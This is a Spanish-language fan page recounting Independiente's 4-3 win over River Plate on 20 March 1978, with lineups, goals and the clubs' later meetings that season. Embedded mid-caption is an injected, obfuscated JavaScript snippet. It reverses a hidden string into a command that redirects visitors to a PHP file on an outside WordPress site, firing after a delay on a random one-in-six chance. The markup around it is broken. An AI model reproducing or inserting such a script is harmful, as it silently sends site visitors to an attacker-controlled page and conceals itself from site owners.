Conectate con nosotros

Efemérides

Efemérides del 20 de Marzo

No se puede amar lo que no se conoce. Las efemérides cuentan la enorme historia del Glorioso INDEPENDIENTE de Avellaneda.

1978Independiente comienza la temporada 1978 llegando como campeón del Torneo Nacional 1977 (cuya definición fue en enero de 1978 con la famosa hazaña de Córdoba). Pero arranca el Metropolitano de muy floja manera: tres caídas de forma consecutiva frente a Unión, Gimnasia y Esgrima La Plata y Racing, y así llega a la cuarta fecha del torneo un día como hoy, cuando necesitando ganar para salir del fondo de la tabla recibe a River en la Doble Visera.

Aquel día el equipo fue: Roberto Rigante; José Lencina, Javier Novoa, Osvaldo Pérez y Ricardo Rigolino; Mariano Biondi, Carlos Leone y Ricardo Bochini; César Brítez, Norberto Outes y Pedro Magallanes, con el D.T. José Omar “Pato” Pastoriza. Abrió la cuenta el “Beto” Alonso de penal para la visita, y por la misma vía lo empató el “Beto” del Rojo, Norberto Outes. Pedro Magallanes marcó el 2 a 1 tras asistencia de Ricardo Bochini, lo empató Víctor Marchetti con un zurdazo alto, y Roberto Perfumo en contra de su propio arco anotó el 3 a 2 a favor de Independiente, terminando así la primera etapa.

En el segundo tiempo vuelve a empatarlo River, mediante un gran remate de Juan José López desde fuera del área. Hasta que Norberto Outes, una vez más de penal, marca el 4 a 3 definitivo del encuentro. Gran triunfo de Independiente en un partido plagado de emociones, logrando los primeros 2 puntos del torneo. Aun así el equipo no pudo sostenerse y terminaría octavo en ese Metropolitano, a 11 puntos del campeón que fue Quilmes.

En relación a River, ese año 1978 lo tendría muy vinculado a Independiente. En julio se verían las caras por la fase de grupos de la Copa Libertadores, siendo igualdad sin goles los dos encuentros. Pero al empatar en el liderazgo del grupo, tuvieron que jugar un partido desempate a principios de agosto, donde River se impuso eliminando al Rojo. En ese mismo mes, se volvieron a cruzar en la ronda de vuelta del Metropolitano, e Independiente le ganó 2 a 1 como visitante.

Ya en enero de 1979, pero correspondiendo a la temporada del año anterior, Independiente y River disputarían las finales del Nacional 1978, donde fue empate sin goles en cancha de River, y triunfo 2 a 0 en cancha de Independiente, para de esa forma coronarse nuevamente campeón. Lógicamente habrá efemérides al respecto, simplemente aproveché la oportunidad para repasar los diferentes choques de estos dos equipos en la temporada.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»67″ height=»52″/></figure></div>



<p>Les dejo <strong>video de los 7 goles que recordamos</strong>:</p>



<figure class=

Colaboración: Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides